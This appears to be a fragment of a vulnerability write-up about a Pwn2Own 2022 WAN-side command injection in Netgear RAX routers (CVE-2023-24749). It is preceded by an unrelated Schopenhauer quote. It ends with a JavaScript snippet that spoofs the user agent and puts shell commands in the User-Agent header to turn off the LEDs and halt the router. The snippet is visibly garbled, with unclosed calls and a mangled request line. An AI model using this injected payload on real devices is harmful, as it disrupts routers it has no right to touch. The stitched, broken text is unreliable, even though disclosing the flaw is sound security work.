Rascals are always sociable, and the chief sign that a man has any nobility in his character is the little pleasure he takes in others company. Arthur Schopenhauer

A breakdown of a bug SEFCOM T0 and I exploited to achieve a WAN-side RCE in some Netgear RAX routers for pwn2own 2022. The bug is a remotely accessible command injection due to bad packet logging, cataloged as CVE-2023-24749. A One-Click WAN-side RCE in Netgear RAX Routers

Quote simple, one might add.

Object.defineProperty(navigator, 'userAgent', {
	get: function () { return 'TEST'; }
const xhr = new XMLHttpRequest()"GET", "/")
xhr.setRequestHeader("User-Agent", '"; ledCli ALLSW MSG_LED_ALL_SW_OFF; sleep 1; halt -f;"');